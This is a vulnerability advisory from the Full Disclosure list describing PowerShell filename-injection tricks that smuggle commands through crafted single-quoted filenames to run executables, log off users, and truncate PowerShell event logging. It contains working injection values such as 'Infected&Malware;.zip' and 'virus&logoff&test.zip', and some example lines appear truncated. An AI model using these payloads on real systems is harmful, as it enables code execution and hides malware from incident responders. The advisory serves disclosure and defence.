[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
[+] twitter.com/hyp3rlinx
[+] twitter.com/malvuln
[+] ISR: ApparitionSec


Microsoft Windows PowerShell

Built on the . NET Framework, Windows PowerShell helps IT professionals and
power users control and automate the administration of the Windows
operating system and applications that run on Windows.

[Vulnerability Type]
PowerShell Single Quote Code Execution / Event Log Bypass

[CVE Reference]

[Security Issue]
In past times I disclosed how PowerShell executes unintended files or
BASE64 code when processing specially crafted filenames.
This research builds on my "PSTrojanFile" work, adding a PS command line
single quote bypass and PS event logging failure.
On Windows CL tab completing a filename uses double quotes that can be
leveraged to trigger arbitrary code execution.
However, if the filename gets wrapped in single quotes it failed, that is
until now.

[Single Quote Code Exec Bypass]
Combining both the semicolon ";" and ampersand "&" characters, I found it
bypasses the single quote limitation given a malicious filename.
The trailing semicolon ";"  delimits the .XML extension and helps trigger
the PE file specified in the case DOOM.exe and the PS event log gets

Take the following three test cases using Defender API which takes a
specially crafted filename.
C:\>powershell Set-ProcessMitigation -PolicyFilePath  "Test;saps DOOM;.xml"

1) Double quotes OK
"Test;saps DOOM;.xml"

2) Single quotes FAILS
'Test;saps DOOM;.xml'

3) Single quotes BYPASS

PowerShell API calls that prefix the "powershell" cmd is a requirement and
may affect many built-in PS API or module commands.
C:\Users\gg\Downloads\>powershell Start-MpScan -Scanpath

Malware.exe lives in Downloads dir, notice how we only need a partial name
as part of the .ZIP archive filename we are scanning here
and that it also excludes the .EXE portion in that filename.

[PS Event Log Bypass]
On Windows PowerShell event logging can be enabled to alert a SOC on
suspicious activity and or for incident response forensic artifact purposes.
However, when bypassing PS single quotes, I noticed an interesting side
effect. The ampersand "&" character seems to truncate the PS event log.
Example, processing 'Infected&Malware;.zip' the Event ID 403 logs
'infected' and not the true name of 'Malware.exe' which was actually

Want to mask the true name of the file from PowerShell Event logging?
(Malware.exe lives in the same directory)
C:\>powershell Get-Filehash  'Infected&Malware;.zip'  -algorithm MD5

Below the event log HostApplication contains 'infected' and not the true
name of Malware.exe that was actually executed due to truncating.

[PS Log ID 403 Snippet]
Engine state is changed from Available to Stopped.



HostApplication=powershell get-filehash 'Infected

powershell Get-Filehash  'Infected&Malware;.zip'  -algorithm MD5

Run some malware plus bypass logging of true file name:
C:\Users\gg\Downloads>powershell get-filehash  'Infected&Malware;.zip'
 -algorithm  md5
PE file Malware.exe in the Downloads directory, notice the .zip we are
scanning doesn't include .exe in the filename.

Defender Anti-Malware API:
powershell Start-MpScan -Scanpath

Call ping cmd using double "&":
C:\>powershell Get-Filehash  'powerfail&ping'  -algorithm  md5

Call a Windows cmd to Logoff the victim:
C:\>powershell Start-MpScan -Scanpath 'virus&logoff&test.zip'

We have options:

A) to call commands use double "&" --> 'virus&logoff&test.zip'
B) bypass PS event logging of the true file name and execute code use "&"
with ";" --> 'Infected&Malware;.zip'


[Network Access]


[Disclosure Timeline]
Vendor Notification: circa 2019
December 27, 2023  : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise. Permission is
hereby granted for the redistribution of this advisory, provided that it is
not altered except by reformatting it, and that due credit is given.
Permission is explicitly given for insertion in vulnerability databases and
similar, provided that due credit is given to the author. The author is not
responsible for any misuse of the information contained herein and accepts
no responsibility for any damage caused by the use or misuse of this
information. The author prohibits any malicious use of security related
information or exploits by the author or elsewhere. All content (c).

Sent through the Full Disclosure mailing list
Web Archives & RSS: https://seclists.org/fulldisclosure/

Reply via email to